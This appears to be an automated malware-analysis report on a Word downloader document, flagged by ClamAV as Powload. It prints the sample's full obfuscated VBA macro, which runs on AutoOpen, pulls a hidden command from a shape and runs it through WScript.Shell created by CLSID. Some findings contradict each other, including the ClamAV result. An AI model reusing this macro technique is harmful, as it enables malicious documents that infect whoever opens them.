Verdict: MALICIOUS
Risk Score: 252

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1203 Exploitation for Client Execution
The sample contains VBA macros that leverage the `WScript.Shell` COM object to execute a command-line payload. This payload is heavily obfuscated but appears to be designed to download and save a second-stage executable, likely from one of the embedded URLs, and then execute it. The use of `cmd.exe` with execution flags and the `GetObject` call are strong indicators of malicious intent.
Heuristics (9)

- ClamAV: Doc.Malware.Powload-6794695-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Powload-6794695-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- VBA instantiates a dangerous COM class by CLSID (critical, OLE_VBA_GETOBJECT_CLSID_DANGEROUS): VBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on. Matched line in script: `End Select Set ZZKijTUEO = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + JatIQwX) On Error Resume Next`
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call. Matched line in script: `End Select Set ZZKijTUEO = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + JatIQwX) On Error Resume Next`
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script: `Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next`
- Suspicious cmd.exe invocation with execution flag (high, SC_STR_CMD): Suspicious cmd.exe invocation with execution flag
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12509 bytes |

SHA-256: ebd3b826e21b8f0a178abe8b91f77b215a5b07ae99b070be4df57d42c7ecd6ea

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. 150 of 239 identifiers look randomly generated (e.g. 'XIZqfYfGWLzjO'), consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "XIZqfYfGWLzjO"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
For Each tCRmww In cjOZubIUH
kTidzb = 112378313 + Oct(199149819) - 145297173 - CBool(68214206 / 158638743) * 210112948 + Log(BWDFEpWI - CLng(42217841)) - 121179680 + Hex(UWaQwB)
Next
Select Case nIlSZJi
Case 313746974
AIanbwB = Cos(85802899)
rWDfl = 31330792
Case 195015284
UJbAA = Sqr(208968723 / CSng(134342122 - Cos(207623383 - 242741274) + viztXIN + Rnd(148788059 - 338837569)))
ijYUNNGf = Hex(IXhoXpZ)
End Select
On Error Resume Next
For Each zbWzcRhHC In VQIIhBfbO
bfAvuww = 285128931 + Oct(328483897) - 269893510 - CBool(230402183 / 233212404) * 262124774 + Log(FVTZhOA - CLng(137751222)) - 125701621 + Hex(wRCYTM)
Next
Select Case OspTTbaF
Case 209804501
qJNPmd = Cos(218375070)
MhGtz = 145696194
Case 46301993
lwcuYX = Sqr(246078164 / CSng(21915691 - Cos(132193451 - 280941349) + ImttTBtKL + Rnd(34774905 - 333976953)))
oVVHif = Hex(tTMGpdc)
End Select
On Error Resume Next
For Each NZVHrkKL In TjuLhH
lVtAMKsU = 259077105 + Oct(175872382) - 96739789 - CBool(35102662 / 198149222) * 290174166 + Log(jNMjf - CLng(284338957)) - 92618784 + Hex(bZKUcwhol)
Next
Select Case iSwlj
Case 174291133
jATQV = Cos(32184809)
TMzjzzbw = 155141669
Case 162786170
aCqPVG = Sqr(252119536 / CSng(194267258 - Cos(6805720 - 311031811) + Ivilhzq + Rnd(305159641 - 210617841)))
UcAQz = Hex(pncku)
End Select
Set zcGIqZF = Shapes("vDinjphmffzs")
On Error Resume Next
For Each MDRDNark In uAGiriYA
mrEdQHZlp = 254285671 + Oct(19122784) - 162367836 - CBool(336891763 / 66175435) * 173302926 + Log(KSISf - CLng(163333038)) - 155647580 + Hex(cNjYMRtTA)
Next
Select Case BWijmJ
Case 201942448
kEhHvqj = Cos(194704665)
PPiLNTFA = 19093991
Case 182887480
ZXtjY = Sqr(248290747 / CSng(53285955 - Cos(26037610 - 121193674) + jwnEoTS + Rnd(143824799 - 123476259)))
sjkdDRBo = Hex(cijhi)
End Select
pJIiAJ = "" + ziJic + jQuHY + zcGIqZF.TextFrame.TextRange.Text + fkmIqnPj + TBpswRJ
On Error Resume Next
For Each KlzYSHp In QhKMTjcLF
voNuPju = 234496582 + Oct(1425250) - 31340175 - CBool(142093183 / 33377164) * 125691362 + Log(sUijbHC - CLng(74975817)) - 338099482 + Hex(zwmqKT)
Next
Select Case BKBPRQ
Case 103785002
QdjHlcL = Cos(92786179)
TwBwjwZk = 269902525
Case 338384224
SzDZjrUuR = Sqr(79108391 / CSng(176429965 - Cos(28057715 - 99123954) + KdTEOl + Rnd(251134105 - 229025172)))
WLRRR = Hex(bicQSC)
End Select
On Error Resume Next
For Each ftkth In HASoPDlQp
SFRous = 156988949 + Oct(76575773) - 86076362 - CBool(188578818 / 122962510) * 131309480 + Log(DaIAcWW - CLng(220659342)) - 189999582 + Hex(joEoFF)
Next
Select Case DHMAZt
Case 251970365
PnVZjEf = Cos(257714439)
ONGCJuS = 200111815
Case 277042021
lzpDSGBZK = Sqr(47967789 / CSng(146232941 - Cos(199003495 - 220110428) + YMiBIwH + Rnd(1979232 - 9859246)))
ZswItNu = Hex(jzAbajD)
End Select
On Error Resume Next
For Each ApwVn In CMELjroC
GmmnTI = 150319400 + Oct(74223059) - 164437374 - CBool(106263990 / 196000478) * 306182640 + Log(aWsjLb - CLng(139535718)) - 156415883 + Hex(iwRthOjrn)
Next
Select Case PrOHz
Case 13310610
rdiXFJum = Cos(250255883)
TAjNhtPI = 264091739
Case 148511364
bIihcZi = Sqr(161598292 / CSng(73405706 - Cos(97771756 - 310491447) + bjrtTYoW + Rnd(50072898 - 310411630)))
NqHqiwzz = Hex(fLQVz)
End Select
Set ZZKijTUEO = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + JatIQwX)
On Error Resume Next
For Each kPvffaG In iXnFZ
TwMcLFH = 106739644 + Oct(49428363) - 184576167 - CBool(190154976 / 113153842) * 161566816 + Log(GYiKm - CLng(68716136)) - 335240117 + Hex(DTQzKq)
Next
Select Case hXPHmUX
Case 152511519
RdPUHS = Cos(18580377)
BCwGpd = 124286432
Case 100634376
FvsMOuQ = Sqr(246946014 / CSng(168943465 - Cos(31805175 - 91061648) + ljjBV + Rnd(296581296 - 65308892)))
iFkQCvIsY = Hex(twrMPbiAD)
End Select
On Error Resume Next
For Each CqlvcV In DXlrz
hzuha = 333954160 + Oct(188842666) - 270372512 - CBool(1665060 / 77100024) * 252099489 + Log(tsJBivHEr - CLng(138430097)) - 201600949 + Hex(jRaWS)
Next
Select Case MoqXm
Case 162925158
GwSmbB = Cos(202943925)
wjcqBsqju = 103417532
Case 80444247
qAIXGW = Sqr(314512782 / CSng(338263058 - Cos(325885581 - 45266167) + FlmYwoR + Rnd(104111737 - 125393019)))
FhizfRLVF = Hex(HaEYFnujF)
End Select
On Error Resume Next
For Each MZzwQnqo In QDooRffIS
azQpnQa = 230397907 + Oct(66222082) - 321930399 - CBool(260581950 / 292594431) * 265421505 + Log(OqnwjQL - CLng(166795692)) - 323400044 + Hex(AozpDniO)
Next
Select Case CVlvkMfqE
Case 212535782
HXPOabrhb = Cos(12874634)
BBdowS = 244782857
Case 204857202
OZulEcu = Sqr(25431236 / CSng(247759652 - Cos(3871274 - 174536033) + tFjcZ + Rnd(229238273 - 97945176)))
wBmwnTk = Hex(vONEZJ)
End Select
On Error Resume Next
For Each FjGpuG In dhSwCGjpz
DzkuJs = 130566134 + Oct(230877970) - 315485465 - CBool(240704876 / 280430972) * 270157331 + Log(KNSBXp - CLng(206175781)) - 274272612 + Hex(JpBLYZvv)
Next
Select Case QVKpwa
Case 160069389
onGzWzoQH = Cos(230948378)
FMASYUnv = 296698585
Case 328270162
unARZT = Sqr(44745590 / CSng(134832990 - Cos(96197724 - 290347221) + bAsijnp + Rnd(87782821 - 311598299)))
qKqHQC = Hex(VLifwTsT)
End Select
Const YqdNOZWNFsO = 0
On Error Resume Next
For Each vHRwKItYm In XkmmqNuC
qmtpjYMI = 5261330 + Oct(337583859) - 28218305 - CBool(16521689 / 250367537) * 113303406 + Log(wJGucPw - CLng(78686759)) - 223488177 + Hex(TzJjrlZjk)
Next
Select Case JBSkZwzs
Case 167638167
ilTMqjGz = Cos(168295996)
taLsMZ = 21015202
Case 188878421
NiVBi = Sqr(107425643 / CSng(304311773 - Cos(284297681 - 144605082) + iQDmzOi + Rnd(210510536 - 317704214)))
KfaHRpiqa = Hex(AuWjLDM)
End Select
On Error Resume Next
For Each jjcwwAsO In YmJLIVNPb
wHtioIC = 131669723 + Oct(297451596) - 260858401 - CBool(167628492 / 130122781) * 24120620 + Log(vKkwwE - CLng(334771589)) - 16762167 + Hex(BvImAHij)
Next
Select Case VPHjqF
Case 267809812
vjzbSFivP = Cos(328242907)
PQXjwWri = 209152702
Case 147033808
MOGJz = Sqr(267054494 / CSng(40785877 - Cos(100795948 - 130272771) + JIISDJiq + Rnd(167446204 - 281235507)))
JtRwwiLK = Hex(WITuTkUIH)
End Select
On Error Resume Next
For Each OfzHou In JwEUAOZXi
biiXh = 190053357 + Oct(140719652) - 98975785 - CBool(238431501 / 184009054) * 52328566 + Log(iwAjiEJ - CLng(188550759)) - 183517849 + Hex(GqWsHVjHt)
Next
Select Case GWbJAth
Case 16663999
sESmdSG = Cos(127611853)
fVNGjk = 156406794
Case 259854236
oVzfd = Sqr(229912357 / CSng(225648339 - Cos(160167525 - 48209067) + qjpWHAi + Rnd(251020476 - 261580179)))
sZACT = Hex(XLAqqlM)
End Select
On Error Resume Next
For Each sBdkdLfBZ In ihuEXJu
jhbnjkV = 342184647 + Oct(35294010) - 149084274 - CBool(163655035 / 118014504) * 252883244 + Log(cWnDuM - CLng(340869608)) - 98673304 + Hex(TlfRFULCd)
Next
Select Case DZNREVsPd
Case 40155471
dHmRE = Cos(154286559)
UPiVRp = 55739726
Case 13121030
TPftT = Sqr(311442042 / CSng(186194380 - Cos(229554633 - 286130372) + EjhBzV + Rnd(58517834 - 230879489)))
iszAzuiOH = Hex(IXJCUZzw)
End Select
On Error Resume Next
For Each QAbrKN In THbVkjE
TiiPqMLTA = 84060069 + Oct(12611690) - 96872909 - CBool(120321703 / 194036103) * 184622630 + Log(wnDBvd - CLng(236748226)) - 108238166 + Hex(LUjbjA)
Next
Select Case rkzSoDw
Case 12798221
hbiIw = Cos(30508862)
fHWzfCzpu = 95623090
Case 331322088
sbrTLYX = Sqr(224383702 / CSng(209110041 - Cos(61910038 - 205578225) + oBvOBFHSH + Rnd(200701511 - 27745161)))
KDzokH = Hex(ZFTJipH)
End Select
On Error Resume Next
For Each jomNUGAW In JjwrZ
BjBrp = 212867215 + Oct(1993251) - 214060530 - CBool(188161058 / 36976412) * 336378897 + Log(Dtzhs - CLng(47427158)) - 327097053 + Hex(ZjzYfKqSu)
Next
Select Case VjAAp
Case 325411059
bSBjH = Cos(64390780)
VFzcC = 179905002
Case 260675052
ubcUjcMfp = Sqr(223196655 / CSng(247638907 - Cos(121503574 - 234528600) + zCDBYR + Rnd(270395754 - 319442234)))
RWpDZN = Hex(PTWioY)
End Select
ZZKijTUEO.Run! pJIiAJ, YqdNOZWNFsO
On Error Resume Next
For Each mDSRNbQ In pwLzCLj
NjzDQSW = 28521830 + Oct(46801003) - 77671906 - CBool(52421925 / 9402214) * 31357133 + Log(Bakjz - CLng(76881356)) - 186922943 + Hex(YvPsovj)
Next
Select Case fDjEF
Case 197606317
WNUhO = Cos(67366311)
TOVjw = 241016264
Case 89213563
OVwmHDo = Sqr(162280576 / CSng(196984544 - Cos(173743803 - 157300997) + jEVAD + Rnd(155565286 - 118291919)))
SdiOQX = Hex(AWHwvpJ)
End Select
On Error Resume Next
For Each iZdpF In Uawli
nUfOqzAic = 285244140 + Oct(156430341) - 38281510 - CBool(128212703 / 172978297) * 325938849 + Log(KKhNjz - CLng(283682856)) - 10685003 + Hex(ZRKqRoPim)
Next
Select Case TrJUFMYZ
Case 260899405
XWfHA = Cos(102563597)
EQOoddPQ = 208631984
Case 277927964
KCIXhkibB = Sqr(275503653 / CSng(187462752 - Cos(8352407 - 48249859) + DzbDmCp + Rnd(15225306 - 19543668)))
SYBqNt = Hex(ZWjOl)
End Select
On Error Resume Next
For Each jjdGlzvfL In KGKYkfCH
MzBNkUs = 84301880 + Oct(6496923) - 289920881 - CBool(318138230 / 157775463) * 204418339 + Log(uWvzF - CLng(212113130)) - 55957420 + Hex(kjlHhwLT)
Next
Select Case kJKttiVt
Case 246511817
kunOQfFPB = Cos(266420009)
zbQhNVbd = 259275296
Case 317289365
hGMOU = Sqr(57297455 / CSng(5257771 - Cos(291846325 - 169393740) + TmYkw + Rnd(114481797 - 139774352)))
cjJfCmh = Hex(LjJuPwziN)
End Select
On Error Resume Next
For Each qTjqwf In EhdAwE
KbXzWJ = 78796853 + Oct(30647158) - 337293845 - CBool(206463953 / 241990802) * 140367273 + Log(wZEFoDLLQ - CLng(39957539)) - 282306390 + Hex(hboZzpXC)
Next
Select Case ipvnvjB
Case 252434425
AGamQf = Cos(192246898)
LtsHtVj = 100545256
Case 270212401
XiBqMTYU = Sqr(233397964 / CSng(62739947 - Cos(113861923 - 295591039) + JZwFkHv + Rnd(72567514 - 59446344)))
ZdiJNkUOY = Hex(wiHSK)
End Select
On Error Resume Next
For Each QNDAKCqz In BamncLM
YStEC = 245489871 + Oct(276736793) - 215207724 - CBool(333296236 / 120790748) * 228769178 + Log(EBAVOGi - CLng(277160228)) - 51330166 + Hex(njOHMVOj)
Next
Select Case oEhGu
Case 82416589
OcNULkIW = Cos(122456823)
aQYVcWBif = 69462747
Case 277720160
ZUSPMuVWu = Sqr(38665808 / CSng(59746427 - Cos(229226672 - 291790028) + cndCa + Rnd(283971110 - 272496274)))
uzKkLi = Hex(XOBpTDsB)
End Select
End Sub